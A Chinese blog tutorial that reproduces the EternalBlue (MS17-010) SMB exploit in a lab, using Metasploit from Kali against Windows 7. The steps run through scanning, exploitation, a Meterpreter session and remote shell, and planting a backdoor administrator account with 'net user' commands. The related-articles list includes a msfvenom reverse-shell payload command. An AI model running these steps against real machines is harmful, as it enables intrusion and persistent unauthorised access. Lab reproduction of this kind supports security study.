永恒之蓝(ms17_010)漏洞复现

最新推荐文章于 2024-05-29 11:22:22 发布
最新推荐文章于 2024-05-29 11:22:22 发布
阅读量330 收藏 1
点赞数 3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48900801/article/details/119112716
版权

永恒之蓝漏洞利用及攻击

一、基础知识介绍:
1.永恒之蓝:
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
2. SMB协议:
SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。
3.SMB工作原理:
(1):首先客户端发送一个SMB negport 请求数据报,,并列出它所支持的所有SMB的协议版本。服务器收到请求消息后响应请求,并列出希望使用的SMB协议版本。如果没有可以使用的协议版本则返回0XFFFFH,结束通信。
(2):协议确定后,客户端进程向服务器发起一个用户或共享的认证,这个过程是通过发送SessetupX请求数据包实现的。客户端发送一对用户名和密码或一个简单密码到服务器,然后通过服务器发送一个SessetupX应答数据包来允许或拒绝本次连接。
(3):当客户端和服务器完成了磋商和认证之后,它会发送一个Tcon或TconX SMB数据报并列出它想访问的网络资源的名称,之后会发送一个TconX应答数据报以表示此次连接是否接收或拒绝。
(4):连接到相应资源后,SMB客户端就能够通过open SMB打开一个文件,通过read SMB读取文件,通过write SMB写入文件,通过close SMB关闭文件。
二、实验环境:
攻击机:kali Linux 2021.1 IP:192.168.245.143
靶机:windows 7 IP:192.168.245.131
三、实验步骤:
1、先使用nmap获取存活主机:
在这里插入图片描述

2、获取目标主机信息:
在这里插入图片描述

3、查看kali 主机数据库是否开启:service postgresql status
在这里插入图片描述Active:inactive (dead) 说明数据库是关闭的
4、打开kali 主机的数据库:service postgresql start
5、再次查看kali 主机的数据库:service postgresql status
在这里插入图片描述

Active:active(exited)说明数据库打开了
6、进行msfdb 数据库初始化,配置数据库相关信息:msfdb init
在这里插入图片描述

7、启动msf:msfconsole
在这里插入图片描述

这样就进入了msf中了,如果你的界面有所不同,没有关系,因为msf每次都会有一个随机的界面
8、查看数据库连接情况:在msf命令提示符下:db_status
在这里插入图片描述

9、搜索ms17_010:search ms17_010
在这里插入图片描述

10、使用ms17_010模块进行漏洞扫描,在此我使用的是下面两条命令
扫描:use auxiliary/scanner/smb/amb ms17_010
攻击:use explot/windows/smb/ms17_010_eternalblue
在这里插入图片描述在这里插入图片描述

这里可以用options来获取帮助
在这里插入图片描述

在这里,只关注两个命令就可以:RHOSTS和THREADS,RHOSTS是要扫描的主机(主机段),THREADS是线程,默认是1,开始使用线程加快扫描
11、设置扫描的主机或者主机段(由于靶机IP地址是192.168.245.131,因此设置扫描主机段为192.168.245.131/24):set rhosts 192.168.245.131/24;然后设置扫描线程为20;最后输入run执行扫描。

在这里插入图片描述

在这里插入图片描述现在可以看到监听(kali)IP(192.168.223.137)及端口(4444),被攻击主机(192.168.223.141)及端口(49159)之间已经建立了连接在这里插入图片描述
四、持续攻击,进行后门种植:
1.显示远程主机系统信息
在这里插入图片描述

2、查看用户身份
在这里插入图片描述

3、对远程主机当前屏幕进行截图
在这里插入图片描述

4、打开截图位置:
在这里插入图片描述

4.获得shell控制台
在这里插入图片描述

因为进去之后是乱码 输入 chcp 65001 ,就可以解决,而且上面显示转到C:\Windows\system32目录下,说明已经获得了shell的控制权。
5.进行后门植入(创建新的管理员账户)
net user shiran 123456 /add //在windows 7上创建一个shiran的用户,以便下次访问
net localgroup administrators shiran /add //将shiran加入到win 7的本地管理员组中,以便获得更大权限
在这里插入图片描述在这里插入图片描述制作不易,点赞偶!!!大佬有不同看法,可以评论,谢谢!

染指诉离殇
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
永恒之蓝ms17_010漏洞复现
m0_50317371的博客
12-08 684
一、永恒之蓝简介 ​永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 漏洞描述: Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代
永恒之蓝漏洞复现(ms17-010)
gjgj的博客
06-18 4990
Metasploit Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。 MSF的更新:apt update ...
Metasploit Framework渗透框架与Msfvenom木马攻防基础到实战技巧
12-15
一、课程概要      本课程主要分享Metasploit Framework渗透框架与Msfvenom木马攻防基础到实战技巧!二、课程目标      本课程致力于帮助广大学员掌握Metasploit及Msfvenom基础使用及实战技巧!三、适合人员      1、零基础大学生      2、IT运维人员      3、服务器安全运维工程师      4、渗透测试工程师四、特别说明      1、本课程支持一次购买,永久观看,请放心购买!      2、本课程系讲师原创课程,如有盗用,欢迎举报!
msf之ms17-010永恒之蓝漏洞
AI_SumSky的博客
06-27 6890
**** 1.熟悉msf的基本用法。 2.熟悉一些渗透中会用到基本的windows命令。 3.复现永恒之蓝漏洞。通过向Windows服务器的SMBv1服务发送精心构造的命令造成溢出,最终导致任意命令的执行。在Windows操作系统中,SMB服务默认是开启的,监听端口默认为445,因此该漏洞造成的影响极大。**** 1.打开MSF默认已经集成了MS17-010漏洞的测试模块 利用search语法查找ms17-010 2.探测主机是否存在漏洞,利用use命令选择第三个测试接口,可探查主机是否存在永恒之蓝漏洞
永恒之蓝MS17-010)详解
最新发布
m0_64481831的博客
05-29 867
SMB是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居都是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。SMB工作原理1、客户端发送一个SMB negport请求数据包,并列出它所支持的所有SMB的协议版本。服务器收到请求消息后响应请求,并列出希望使用的SMB协议版本。如果没有可用的协议版本则返回0xFFFFH,结束通信。
MS17-010永恒之蓝漏洞分析与复现
热门推荐
未完成的歌~的博客
03-12 6万+
文章目录一、漏洞简介1、永恒之蓝介绍:2、漏洞原理:3、影响版本:二、漏洞复现复现环境:复现过程:1、主机发现:2、使用MSF的永恒之蓝漏洞模块3、使用ms17-010扫描模块,对靶机进行扫描:4、使用ms17-010攻击模块,对靶机进行攻击5、得到靶机shell6、通过shell对靶机进行控制 一、漏洞简介 1、永恒之蓝介绍: 永恒之蓝漏洞MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露
MS17-010漏洞复现
Al345__的博客
07-01 1362
1、永恒之蓝介绍:永恒之蓝漏洞MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。据统计,全球100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。
永恒之蓝MS17-010漏洞复现
tubug的博客
05-21 5638
2017 年 4 月 14 日晚,黑客团体 Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用 Windows 系统的 SMB 漏洞可以获取系统最高权限。5 月 12 日,不法分子通过改造“永恒之蓝”制作了 wannacry 勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网呾政府机构与网中招,被勒索支付高额赎金才能解密恢复文件。.........
永恒之蓝ms17_010方程式漏洞利用工具.rar
12-03
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.***.*** LPORT=4**** -f dll > x64.dll,reverse或者bind方式,替换到目录下,执行第一个检测安装backdoor,第二个选项卡attack就可以了。...
永恒之蓝ms17010漏洞检测工具
04-19
在司徒西大神易语言ms17010漏洞检测源码上稍做修改,并做成了批处理,可以单机也可以网段批量检测永恒之蓝漏洞。优点是体积小,扫描准确。缺点是扫描速度较慢。 使用方法: 此程序为易语言开发,如被误报病毒,可以...
网安永恒之蓝MS17-010检测工具.zip
03-01
永恒之蓝MS17-010漏洞检测工具
永恒之蓝检测工具MS17-010漏洞扫描工具
06-28
"永恒之蓝"是2017年引起全球关注的安全事件,主要由名为"MS17-010"的Windows系统漏洞引发。这个漏洞利用了微软Windows操作系统中的SMB(Server Message Block)服务,允许攻击者远程执行代码,从而控制受影响的系统...
PostgreSQL 服务启动后停止
韶光
11-01 2万+
PostgreSQL服务停止后,在任务管理器中启动PostgreSQL服务,服务显示已停止,误以为是服务根本未启动。打开服务窗口,启动PostgreSQL服务,才发现报错,服务启动后停止。这个事情告诉我们不要懒,开服务还是要在服务中心去开,否则你根本不知道是什么错误,什么原因。 进入事件查看器(计算机管理——事件查看器——Windows日志)查看,并没
MS17-010永恒之蓝漏洞复现(手把手教程,超细!)
qq_46089119的博客
02-06 7584
ms17-010漏洞利用(本地环境复现)
永恒之蓝 ms17_010漏洞
qq_64501184的博客
11-28 999
漏洞复现
永恒之蓝 MS17-010漏洞复现
春日野穹
12-21 1648
目录导航 一. 复现环境 二. 漏洞原理 1.漏洞简介 2.漏洞原理代码详解 三. 漏洞复现 1.信息收集 2.漏洞探测 3.漏洞利用 一. 复现环境 工具:msf 攻击机:Kali linux 虚拟机一台 ip: 169.254.93.24 测试机:Windows 2008 r2 虚拟机一台 ip: 169.254.93.243 网络环境:手机WiFi网络USB共享,同一局域网,桥接网络模...
Postgresql数据库设置开机自启动
weixin_44280843的博客
10-12 3239
Centos7部署Postgresql数据库后设置开机自启动
安装postgres后状态不对
无痕的博客
02-15 747
安装后pg库状态为exited: 仔细分析,无非几个原因: log目录的权限问题,比如log文件指定的目录postgres用户无权写入,因此没有产生任何log文件。检查了/var/lib/postgresql/9.1/main的目录,没有发现问题。 配置文件的权限问题,检查了/etc/postgresql/9.1/main目录,也没有发现任何问题,postgres用户是有权限读取配置文件的。 配置文件有错误导致无法正常启动postgresql。排除了上面的两个原因,这个应该是最.
永恒之蓝ms17_010漏洞复现实验
01-03
很抱歉,根据提供的引用内容,我无法提供关于永恒之蓝MS17-010漏洞复现实验。这是因为复现漏洞需要特定的环境和设备,并且涉及到非法活动。我强烈建议您不要尝试复现漏洞,以免违法和造成不必要的损失。 如果您对网络安全感兴趣,我可以为您提供一些关于网络安全的基础知识和防护措施。请问您对此感兴趣吗?

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值